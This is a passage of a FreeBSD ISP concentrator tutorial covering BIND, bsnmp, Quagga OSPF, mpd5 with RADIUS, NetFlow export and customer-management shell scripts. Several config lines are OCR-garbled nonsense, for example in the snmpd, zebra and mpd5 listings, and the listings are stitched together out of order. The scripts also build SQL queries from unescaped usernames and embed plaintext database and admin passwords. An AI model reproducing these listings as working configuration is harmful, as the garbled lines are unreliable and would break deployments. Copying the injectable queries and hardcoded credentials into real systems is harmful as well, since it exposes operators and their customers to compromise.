zone "103.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "104.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "105.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "106.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "107.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "108.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "109.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "110.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "111.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "112.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "113.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "114.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "115.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "116.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "117.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "118.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "119.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "120.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "121.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "122.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "123.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "124.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "125.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "126.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "127.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "254.169.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "0.0.192.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "2.0.192.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "100.51.198.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "113.0.203.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "8.b.d.0.1.0.0.2.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "test" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "example" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "invalid" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "example.com" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "example.net" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "example.org" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "18.198.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "19.198.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "240.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "241.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "242.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "243.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "244.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "245.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "246.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "247.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "248.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "249.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "250.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "251.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "252.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "253.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "254.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "1.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "3.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "4.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "5.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "6.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "7.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "8.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "9.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "a.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "b.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "c.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "d.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "e.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "0.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "1.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "2.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "3.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "4.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "5.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "6.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "7.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "8.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "9.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "a.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "b.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "0.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "1.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "2.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "3.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "4.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "5.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "6.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "7.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "c.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "d.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "8.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "9.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "a.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "b.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "c.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "d.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "e.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "f.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "ip6.int" { type master; file "/usr/local/etc/namedb/master/empty.db"; };

controls {
	inet 127.0.0.1 allow { localhost; } keys { "rndc-key"; };
};

include "/usr/local/etc/namedb/rndc.key";

#eof


Listing 22. 

# ssh-keygen 

# cat /root/.ssh/id_rsa.pub

Listing 23.

# vi /etc/snmpd.config

location := "connection lost"
COnnack == ~krqoncalvest@conneckronlost. com.br
system := 1 # FreeBSD
traphost := localhost
trapport := 162
read := "mudar_community"
Pea = 9) eka one onm=

%snmpd
begemotSnmpdDebugDumpPdus = 2
begemotSnmpdDebugSyslogPri = 7

begemotSnmpdCommunityString.0.1 = $(read)
begemotSnmpdCommunityDisable = 1

begemotSnmpdPortStatus.0.0.0.0.161 = 1
begemotSnmpdLocalPortStatus."/var/run/snmpd.sock" = 1
begemotSnmpdLocalPortType."/var/run/snmpd.sock" = 4

begemotTrapSinkStatus.[$(traphost)].$(trapport) = 4
begemotTrapSinkVersion.[$(traphost)].$(trapport) = 2
begemotTrapSinkComm.[$(traphost)].$(trapport) = $(trap)

sysContact = $(contact)
sysLocation = $(location)
sysObjectId = 1.3.6.1.4.1.12325.1.1.2.1.$(system)

snmpEnableAuthenTraps = 2

begemotSnmpdModulePath."mibII" = "/usr/lib/snmp_mibII.so"
begemotSnmpdModulePath."pf" = "/usr/lib/snmp_pf.so"
begemotSnmpdModulePath."hostres" = "/usr/lib/snmp_hostres.so"
begemotSnmpdModulePath."ucd" = "/usr/local/lib/snmp_ucd.so"

#eof

Listing 24.

# vi /usr/local/etc/quagga/zebra.conf
!
=) st) oy sume mie Te
hostname valhalla 

password 8 mudarsenha
enable password 8 mudarsenha
service password-encryption
log file /var/log/zebra.log
!
interface em0
!
interface em1
!
interface igb0
!
interface igb1
!
interface igb2
!
interface igb3
!
interface igb4
!
interface igb5
!
interface igb6
!
interface igb7
!
interface lo0
!
interface lo1
!
interface pflog0
!
interface pfsync0
!
access-list filter-term permit 127.0.0.1/32
access-list filter-term deny any
!
ip forwarding
ipv6 forwarding
!
line vty
 access-class filter-term
!
!eof


# vi /usr/local/etc/quagga/ospfd.conf
!
hostname valhalla
password 8 mudarsenha
enable password 8 mudarsenha
service password-encryption
log file /var/log/ospf.log
!
interface em0
!
interface em1
!
interface igb0
!
interface igb1
!
interface igb2
!
interface igb3
!
interface igb4
 ip ospf network non-broadcast
!
interface igb5
!
interface igb6
!
interface igb7
!
interface lo0
!
interface lo1
!
interface pflog0
!
interface pfsync0
!
router ospf
 ospf router-id 203.0.113.5
 redistribute connected route-map PRIVATE
 redistribute kernel
 passive-interface default
 no passive-interface igb4
 network 203.0.113.0/24 area 0.0.0.0
 neighbor 203.0.113.1
!
ip prefix-list PRIVATE-NET seq 5 permit 203.0.113.0/24 le 32
ip prefix-list PRIVATE-NET seq 10 deny any
!
route-map PRIVATE permit 10
 match ip address prefix-list PRIVATE-NET
!
access-list filter-term permit 127.0.0.1/32
access-list filter-term deny any
!
line vty
 access-class filter-term
!
!eof


# vi /usr/local/etc/quagga/ospf6d.conf
!
hostname valhalla
password 8 mudarsenha
enable password 8 mudarsenha
service password-encryption
log file /var/log/ospf6.log
debug ospf6 lsa unknown
!
interface em0
!
interface em1
!
interface igb0
!
interface igb1
!
interface igb2
!
interface igb3
!
interface igb4
!
interface igb5
!
interface igb6
!
interface igb7
!
interface lo0
!
interface lo1
!
interface pflog0
!
interface pfsync0
!
router ospf6
 router-id 203.0.113.5
 redistribute kernel route-map PRIVATE6
 redistribute connected route-map PRIVATE6
 interface igb4 area 0.0.0.0
!
ipv6 prefix-list PRIVATE6-NET seq 5 permit 2001:db8::/32 ge 64
ipv6 prefix-list PRIVATE6-NET seq 10 deny any
ipv6 prefix-list filter-term seq 2 permit ::1/128
ipv6 prefix-list filter-term seq 10 deny any
!
route-map PRIVATE6 permit 10
 match ipv6 address prefix-list PRIVATE6-NET
!
line vty
 access-class filter-term
!


Listing 25.

# vi /usr/local/etc/mpd5/mpd.conf
startup:
# console
	set user mpdadmin 123mudar admin
	set console self 127.0.0.1 5005
	set console open
# web interface
	set web self 203.0.113.5 5006
	set web open
# radius to receive coa and pod
	set radsrv self 198.51.100.5 3799
	set radsrv peer 198.51.100.2 senhaclienteradius
	set radsrv enable coa disconnect
	set radsrv open
# flow export
	set netflow peer ip port
	set netflow timeouts 60 120
	set global max-children 50000


Listing 26.

	log =a wads + ekace
	# log +all

	create bundle template B

# compression and cryptography
# uncomment these two lines to enable compression and encryption
	# set bundle enable compression
	# set bundle enable encryption

# ipv6
	set bundle enable ipv6cp

# Set IP addresses. Peer address will later be replaced by RADIUS.
	Ser apcpvdns 203202113 ..5 203.021 321
	set iface up-script "/root/scripts/ppp-up.sh"
	set iface down-script "/root/scripts/ppp-down.sh"
	set iface enable proxy-arp
	set iface enable netflow-in
	set iface enable netflow-out

# compression and cryptography
# uncomment these 7 lines to enable compression and encryption
	# set iface enable tcpmssfix
	# set ccp yes mppc
	# set mppc yes e40
	# set mppc yes e56
	# set mppc yes e128
	# set mppc yes stateless
	# set ecp disable dese-bis dese-old

# create link template with common info
	create link template common pppoe
# enable multilink protocol
	set link enable multilink
# set bundle template to use
	set link action bundle B
	set link max-children 50000
# enable peer authentication
	set link disable chap pap eap
# choose between chap or pap, remember to change your radius settings
# uncomment the options you desire
	set link enable chap
	set link enable pap

	# set link yes acfcomp protocomp
	set link enable report-mac
	set link keep-alive 10 60
	# set link mtu 1492
	set link mru 1492
	set link bandwidth 10000000

	load radius

	set pppoe service

# template for ifaces listening, using the common template
	create link template igb3 common
	set link max-children 10000
	# set auth max-logins 0
	set pppoe iface igb3
	set link enable incoming

# you can enable other interfaces to listen on your internal network and
# respond to pppoe requests

# template for ifaces listening, using the common template
	# create link template igb2 common
	# set link max-children 10000
	## set auth max-logins 0
	# set pppoe iface igb2
	# set link enable incoming

# template for ifaces listening, using the common template
	# create link template igb1 common
	# set link max-children 10000
	## set auth max-logins 0
	# set pppoe iface igb1
	# set link enable incoming

# template for ifaces listening, using the common template
	# create link template igb0 common
	# set link max-children 10000
	## set auth max-logins 0
	# set pppoe iface igb0
	# set link enable incoming

Listing 27.

	set radius config /etc/radius.conf
	set radius server localhost testing123 1812 1813
	set radius retries 3
	set radius timeout 3
# send the given IP in the RAD_NAS_IP_ADDRESS attribute to the server.
	set radius me 1.1.1.1
# send accounting updates every 5 minutes
	set auth acct-update 300
# enable RADIUS, and fall back to mpd.secret if RADIUS auth failed
	set auth enable radius-auth
# enable RADIUS accounting
	set auth enable radius-acct
# protect our requests with the message-authenticator
	set radius enable message-authentic

#eof
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# cd /usr/ports/net/radvd 


# make install clean 
Install bsnmp-ucd: 


# cd /usr/ports/net-mgmt/bsnmp-ucd/ 


# make install clean 
Let’s now create the settings of pf: Listing 18. 


Edit /etc/ntp.conf because you need the correct time to avoid problems in your logs:

#server 0.freebsd.pool.ntp.org iburst
#server 1.freebsd.pool.ntp.org iburst
#server 2.freebsd.pool.ntp.org iburst
#server 3.freebsd.pool.ntp.org iburst
server a.ntp.br
server b.ntp.br
server c.ntp.br
Compile a new kernel:

cd /usr/src/sys/amd64/conf/
mkdir -p /root/kernels/
cp GENERIC /root/kernels/valhalla
# the symlink must point into the directory created above (/root/kernels, not /root/kernel)
ln -s /root/kernels/valhalla .
cd /usr/src

Add these lines to the kernel: Listing 19.

Now let's make some adjustments in the operating system to attempt to fit the current situation: Listing 20.

Let's configure bind as the recursive server for use by clients and the server: Listing 21.

Create the key:

# cd /usr/local/etc/namedb/
# rndc-confgen -a

Create log files:

# touch /var/log/named.log
# touch /var/log/security.log
# touch /var/log/xfer.log
# chown bind /var/log/named.log
# chown bind /var/log/security.log
# chown bind /var/log/xfer.log
Create an ssh key for the functioning of the cgi of the support system: Listing 22. Now let's configure bsnmp to enable snmp for monitoring: Listing 23.
Let's configure quagga for redistribution of routes via ospf: I'm not calling authentication between neighbors, but please enable it in your production network (Listing 24).
Create log files:

# touch /var/log/ospf.log
# touch /var/log/ospf6.log
# touch /var/log/zebra.log
# chown quagga:quagga /var/log/ospf.log
# chown quagga:quagga /var/log/ospf6.log
# chown quagga:quagga /var/log/zebra.log

Now the most important guy in the server -> the mpd5!
Create the configuration file: Listing 25.

default:
    load pppoe_server

common:
    # enable multilink protocol
    set link enable multilink
    # set bundle template to use
    set link action bundle B
    # allow peer to authenticate us
    set link disable chap pap
    set link accept chap pap
    set auth authname MyLogin
    # set infinite redial attempts
    set link max-redial 0

pppoe_server: Listing 26. radius: Listing 27.

Create radius.conf file:

# vi /etc/radius.conf
auth 198.51.100.2 senhaclienteradius
acct 198.51.100.2 senhaclienteradius

Create mpd.secret file to have no problems:

# touch /usr/local/etc/mpd5/mpd.secret

Create the log file:

# touch /var/log/mpd5.log

Add in the last lines of the syslog.conf file:

# vi /etc/syslog.conf
!mpd5
*.* /var/log/mpd5.log

Create the directory for the configuration files of radvd:

# mkdir -p /usr/local/etc/mpd5/ipv6

About NetFlow there are three situations:

-> If you are using single-stack (v4 or v6) and NAT, mpd does the job. Enable in mpd.conf:

set netflow peer ip port
set netflow timeouts 60 120
set iface enable netflow-in
set iface enable netflow-out

Figure 5. SNMP Data - Traffic (bits per second over 24 hours; Inbound current 176.61 M, average 294.09 M, maximum 434.23 M; Outbound current 22.16 M, average 32.99 M, maximum 59.21 M)
Listing 28.

# touch /usr/local/etc/rc.d/nf_export
# chmod 755 /usr/local/etc/rc.d/nf_export
# cat /usr/local/etc/rc.d/nf_export

#!/bin/sh
#written by tfgoncalves (at) connectionlost (dot) com(dot) br
#1414503716
# REQUIRE: LOGIN
#
# Add the following lines to /etc/rc.conf to enable nf_export
# nf_export_enable (bool): Set to "NO" by default.
# Set it to "YES" to enable nf_export

. /etc/rc.subr

name=nf_export
rcvar=${name}_enable    # set_rcvar is obsolete on current FreeBSD
load_rc_config $name
start_cmd="${name}_start"
stop_cmd="${name}_stop"
: ${nf_export_enable="NO"}

nf_export_start()
{
    # hook ng_netflow between the lower and upper halves of igb4 so that
    # both directions are accounted, then export to the collector over UDP
    /usr/sbin/ngctl mkpeer igb4: netflow lower iface0
    /usr/sbin/ngctl name igb4:lower netflow_1
    /usr/sbin/ngctl connect netflow_1: igb4: iface1 upper
    /usr/sbin/ngctl connect netflow_1: netflow_1: out0 out1
    /usr/sbin/ngctl mkpeer netflow_1: ksocket export9 inet/dgram/udp
    /usr/sbin/ngctl name netflow_1:export9 ksocket_1
    /usr/sbin/ngctl msg ksocket_1: connect inet/203.0.113.15:700
}

nf_export_stop()
{
    /usr/sbin/ngctl shutdown netflow_1:
}

run_rc_command "$1"
#eof


Listing 29.

# mkdir -p /root/scripts/
# vi /root/scripts/ppp-up

#!/bin/sh
#written by tfgoncalves (at) connectionlost (dot) com(dot)br
#1414503716

# mpd5 calls this as: ppp-up <interface> <proto> <local-ip> <remote-ip> <authname> ...
radius="/usr/local/bin/mysql -u userradius -h 198.51.100.2 radius -psenharadius -s -N -e"

if [ "$2" = "inet" ]
then
    c_ip=$4
    c_ip_first=`echo $4 | cut -d"." -f1`
fi
if [ "$2" = "inet6" ]
then
    c_ip6=$4
fi

username=$5

c_bloqueado=`$radius"select bloqueado from radcheck where attribute='ClearText-Password' and UserName='$username';"`
if [ -z "$c_bloqueado" ]
then
    c_bloqueado=`$radius"select bloqueado from radcheck where attribute='Password' and UserName='$username';"`
fi

# blocked customers are collected in pf tables (see pf.conf, Listing 18)
if [ "$2" = "inet" ] && [ "$c_bloqueado" = 1 ]
then
    /sbin/pfctl -t BLOQUEADOS -T add $c_ip
fi
if [ "$2" = "inet6" ] && [ "$c_bloqueado" = 1 ]
then
    /sbin/pfctl -t BLOQUEADOS6 -T add $c_ip6
fi
# 10.x.x.x customers are private (NATed), the rest public
if [ "$2" = "inet" ] && [ "$c_ip_first" = 10 ]
then
    /sbin/pfctl -t PRIVADOS -T add $c_ip
elif [ "$2" = "inet" ]
then
    /sbin/pfctl -t PUBLICOS -T add $c_ip
fi
if [ "$2" = "inet6" ]
then
    /sbin/pfctl -t PUBLICOS6 -T add $c_ip6
fi

#V6 prefix from db
ng_prefix=`$radius"select value from radreply where attribute='Framed-IPv6-Prefix' and UserName='$username';"`
# keep the first four hextets, e.g. 2001:db8:cafe:a1::/64 -> 2001:db8:cafe:a1
ng_subnet=$(echo $ng_prefix | cut -d: -f1-4)

#V6 prefix autogen (alternative: derive the /64 from the ng interface number)
#ng=$(echo $1 | tr -d '[:alpha:]')
#ng_prefix=$(printf '%x' $((0xA0 + $ng)))
#ng_subnet=2001:db8:cafe:$ng_prefix

if [ "$ng_subnet" != "" ]
then
    /sbin/ifconfig $1 inet6 $ng_subnet::1 prefixlen 64
    ra_pid=/usr/local/etc/mpd5/ipv6/$1
    ra_conf=$ra_pid.conf
    # write a radvd config for this ng interface and start one radvd per session
    echo 'interface' $1 > $ra_conf
    echo '{ AdvSendAdvert on; MinRtrAdvInterval 5; MaxRtrAdvInterval 100;' >> $ra_conf
    echo ' prefix' $ng_subnet::/64 '{AdvOnLink on; AdvAutonomous on; };' >> $ra_conf
    # the RDNSS address is illegible in the source; 2001:db8::1 is a placeholder
    echo ' RDNSS 2001:db8::1 {}; };' >> $ra_conf
    /usr/local/sbin/radvd -C /usr/local/etc/mpd5/ipv6/$1.conf -p /usr/local/etc/mpd5/ipv6/$1.pid &
fi
#eof

# chmod +x /root/scripts/ppp-up


Listing 30.

# vi /root/scripts/ppp-down

#!/bin/sh
#written by tfgoncalves (at) connectionlost (dot) com(dot)br
#1414503716

radius="/usr/local/bin/mysql -u userradius -h 198.51.100.2 radius -psenharadius -s -N -e"

if [ "$2" = "inet" ]
then
    c_ip=$4
    c_ip_first=`echo $4 | cut -d"." -f1`
else
    c_ip6=$4
fi

username=$5

# remove the address from whichever pf tables ppp-up put it in
if [ "$2" = "inet" ] && [ "$c_ip_first" = 10 ]
then
    /sbin/pfctl -t PRIVADOS -T del $c_ip
fi
if [ "$2" = "inet" ]
then
    /sbin/pfctl -t PUBLICOS -T del $c_ip
    /sbin/pfctl -t BLOQUEADOS -T del $c_ip
fi
if [ "$2" = "inet6" ]
then
    /sbin/pfctl -t PUBLICOS6 -T del $c_ip6
    /sbin/pfctl -t BLOQUEADOS6 -T del $c_ip6
fi

# stop the radvd that ppp-up started for this interface and drop its files
if [ -e /usr/local/etc/mpd5/ipv6/$1.pid ]
then
    if6=$(cat /usr/local/etc/mpd5/ipv6/$1.pid)
else
    if6=""
fi
if [ -n "$if6" ]
then
    /bin/kill -9 $if6
    rm /usr/local/etc/mpd5/ipv6/$1.*
fi
#eof
Listing 31.

# vi /root/scripts/drop_blocked

#!/bin/sh
#written by tfgoncalves (at) connectionlost (dot) com(dot)br
#1414503716

radius="/usr/local/bin/mysql -u userradius -h 198.51.100.2 radius -psenharadius -s -N -e"

# every customer flagged as blocked that still belongs to a plan (groupname)
$radius"select radcheck.username from radcheck, usergroup where usergroup.username=radcheck.username and radcheck.bloqueado='1' and usergroup.groupname!='';" > /tmp/drop_blocked

while read line
do
    # drop via POD: a script on the radius host disconnects the user from any
    # concentrator (the ssh command line is partly illegible in the source)
    ssh -p 2220 198.51.100.2 /root/scripts/pod_drop.sh $line < /dev/null

    # shutdown ng: drops only customers that are connected on this concentrator
    # /root/scripts/drop_force $line
    echo $line" - dropped!"
    sleep 5
done < /tmp/drop_blocked
#eof


Listing 32.

# vi /root/scripts/drop_force

#!/bin/sh
#written by tfgoncalves (at) connectionlost (dot) com(dot)br
#1414503716

if [ -z "$1" ]
then
    echo "Usage: $0 {customer}"
    exit 1
fi

radius="/usr/local/bin/mysql -u userradius -h 198.51.100.2 radius -psenharadius -s -N -e"

ip=`$radius"select value from radreply where attribute='Framed-IP-Address' and username='$1';"`

if [ -z "$ip" ]
then
    echo "Invalid customer!"
    exit 0
else
    # the ng interface that routes this customer's address (Netif column of netstat -rn)
    ng=$(netstat -rn | grep $ip | awk '{print $6}')
    if [ -z "$ng" ]
    then
        echo "Customer not connected on `uname -n`!"
        exit 0
    else
        echo $ng
        # close the open accounting record, then tear the netgraph node down
        $radius"update radacct set acctstoptime=now() where username='$1' and acctstoptime is null;"
        /usr/sbin/ngctl shutdown $ng:
        echo "Customer "$ng" dropped!"
    fi
fi
#eof
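An added example, not one of the article's scripts, that isolates the interface lookup drop_force does with netstat -rn | grep $ip | awk '{print $6}': grepping the address as a substring also matches longer addresses that merely start with it, so a customer on 10.0.0.1 can return the ng interfaces of 10.0.0.10 and 10.0.0.100 as well, and ngctl shutdown would then hit the wrong session. The routing-table lines below are constructed sample output, and the second function matches the Destination column exactly instead.

```shell
#!/bin/sh
# Constructed sample of "netstat -rn" output (not captured from a real box);
# the column layout is the one the article's drop_force assumes.
SAMPLE_ROUTES='Destination        Gateway        Flags  Refs  Use  Netif Expire
default            203.0.113.1    UGS       0    0   igb4
10.0.0.1           link#12        UH        0    0   ng0
10.0.0.10          link#13        UH        0    0   ng1
10.0.0.100         link#14        UH        0    0   ng2
203.0.113.15       link#15        UH        0    0   ng3'

# The lookup as drop_force does it: the address is used as a substring
# pattern, so every route whose line contains it is selected.
# $1 = customer IP, stdin = routing table.
ng_iface_substring() {
    grep "$1" | awk '{print $6}'
}

# Exact match on the Destination column, and only an ng(4) interface is
# accepted, so a longer address that starts with the same digits, or a
# stray line, never selects a node.
# $1 = customer IP, stdin = routing table. Prints the Netif or nothing.
ng_iface_exact() {
    awk -v ip="$1" '
        $1 == ip {
            for (i = 2; i <= NF; i++)
                if ($i ~ /^ng[0-9]+$/) { print $i; exit }
        }'
}

# Wrappers over the constructed table (replace the printf with netstat -rn).
lookup_substring() { printf '%s\n' "$SAMPLE_ROUTES" | ng_iface_substring "$1"; }
lookup_exact()     { printf '%s\n' "$SAMPLE_ROUTES" | ng_iface_exact "$1"; }
```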
Listing 33.

# touch /usr/local/etc/rc.d/cpu_affinity
# chmod 755 /usr/local/etc/rc.d/cpu_affinity
# cat /usr/local/etc/rc.d/cpu_affinity

#!/bin/sh
#written by tfgoncalves (at) connectionlost (dot) com(dot)br
#1414503716
# REQUIRE: LOGIN
#
# Add the following lines to /etc/rc.conf to enable cpu_affinity
# cpu_affinity_enable (bool): Set to "NO" by default.
# Set it to "YES" to enable cpu_affinity

. /etc/rc.subr

name=cpu_affinity
rcvar=${name}_enable
load_rc_config $name
start_cmd="${name}_start"
stop_cmd="${name}_stop"
: ${cpu_affinity_enable="NO"}

cpu_affinity_start()
{
    # The printed listing pins each NIC interrupt to one core with a
    # "/usr/bin/cpuset -l <core> -x <irq>" line per IRQ. The IRQ numbers
    # below are the ones legible in the source (one more is not); the core
    # numbers are not legible, so they are spread round-robin here. Find
    # your IRQs with "vmstat -i" and adjust to your hardware.
    ncpu=$(sysctl -n hw.ncpu)
    core=0
    for irq in 259 268 286 295 296 297 298 299 300 301 302
    do
        /usr/bin/cpuset -l $core -x $irq
        core=$(( (core + 1) % ncpu ))
    done
    # pin the netisr software-interrupt threads as well
    for tid in $(procstat -at | awk '/swi1: netisr/ {print $2}')
    do
        /usr/bin/cpuset -l $core -t $tid
        core=$(( (core + 1) % ncpu ))
    done
}

cpu_affinity_stop()
{
    # nothing to undo: the bindings only last until the next boot
    :
}

run_rc_command "$1"
#eof

Permissions to be executable:

# chmod +x /usr/local/etc/rc.d/cpu_affinity
-> If you are using Dual-Stack and not using NAT. Enable via netgraph to export flows from the external interface. Create the rc for nf_export: Listing 28. Consider igb4 as the external interface and 203.0.113.15:700 as the ip:port of the NetFlow collector. Enable in rc.conf:

nf_export_enable="YES"

To start NetFlow export:

# /usr/local/etc/rc.d/nf_export start

To stop NetFlow export:

# /usr/local/etc/rc.d/nf_export stop

-> If you are using Dual-Stack and using NAT. Create the directory for the control and pid files for softflowd:

# mkdir -p /usr/local/etc/mpd5/netflow

Add this line in the ppp-up script:

/usr/local/sbin/softflowd -i $1 -n 186.250.56.16:670 -v 9 -c /usr/local/etc/mpd5/netflow/$1.ctl &

# vi /root/scripts/ppp-up

if [ "$2" = "inet" ]
then
    c_ip=$4
    c_ip_first=`echo $4 | cut -d"." -f1`
    /usr/local/sbin/softflowd -i $1 -n 203.0.113.15:700 -v 9 -c /usr/local/etc/mpd5/netflow/$1.ctl &
fi

And add this line in the ppp-down script:

/usr/local/sbin/softflowctl -c /usr/local/etc/mpd5/netflow/$1.ctl shutdown

# vi /root/scripts/ppp-down

if [ "$2" = "inet" ]
then
    c_ip=$4
Listing 34.

# mkdir -p /usr/local/www/nginx/sst
# vi /usr/local/www/nginx/sst/sst.cgi

#!/bin/sh
#written by tfgoncalves (at) connectionlost (dot) com(dot)br
#1414503716

radius="/usr/local/bin/mysql -u userradius -h 198.51.100.2 radius -psenharadius -s -N -e"

#change the pass here
pass="mudar321!"

# the "New query" link printed after every answer
new_query_form()
{
    echo '<form method="link" action="sst">'
    echo '<input type="submit" value="New query">'
    echo '</form>'
}

echo "Content-type: text/html"
echo ""
echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
echo '<title>SST</title>'
echo '</head>'
echo '<body>'
echo "<center>------------------------------------------ ISP ------------------------------------------</center>"

echo "<form method=GET action=\"${SCRIPT}\">" \
    '<table nowrap>' \
    '<tr><td>Client: </TD><TD><input type="text" name="cliente" size=50></td></tr>' \
    '</table>'
